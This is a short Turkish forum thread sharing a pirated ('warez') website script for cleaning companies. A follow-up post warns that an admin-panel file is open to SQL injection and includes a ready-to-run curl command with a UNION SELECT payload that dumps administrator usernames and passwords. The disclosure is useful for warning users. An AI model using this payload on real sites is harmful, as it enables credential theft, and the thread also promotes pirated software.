Temizlik şirketi scripti

Selamlar. Temizlik şirketleri için yazılan warez scripttir. Sorunsuz çalışmakta. Kurulumda sorun yaşayanlar veya kurdurmak isteyen arkadaşlar öm atabilir. Arşivinize ekleyin...

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Bu scriptte SQL Injection var meraklısına hitaben demiş olayım.
Normal veri alışverişinde sıkı önlem varken panel altındaki bir dosyada sql injection web uygulama güvenlik açığı mevcut.

Dosya: http://localhost/panel/altkategori.php
HTTP Method: POST

Örnek:
Kod:
curl http://localhost/panel/altkategori.php -X POST -d "kategoriId=33+union+select+1,2,3,group_concat(yonetici_kullanici,0x0a,yonetici_sifre),5,6,7,8+from+yonetici--+"
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
131,693Konular
3,270,390Mesajlar
315,906Kullanıcılar
Üst Alt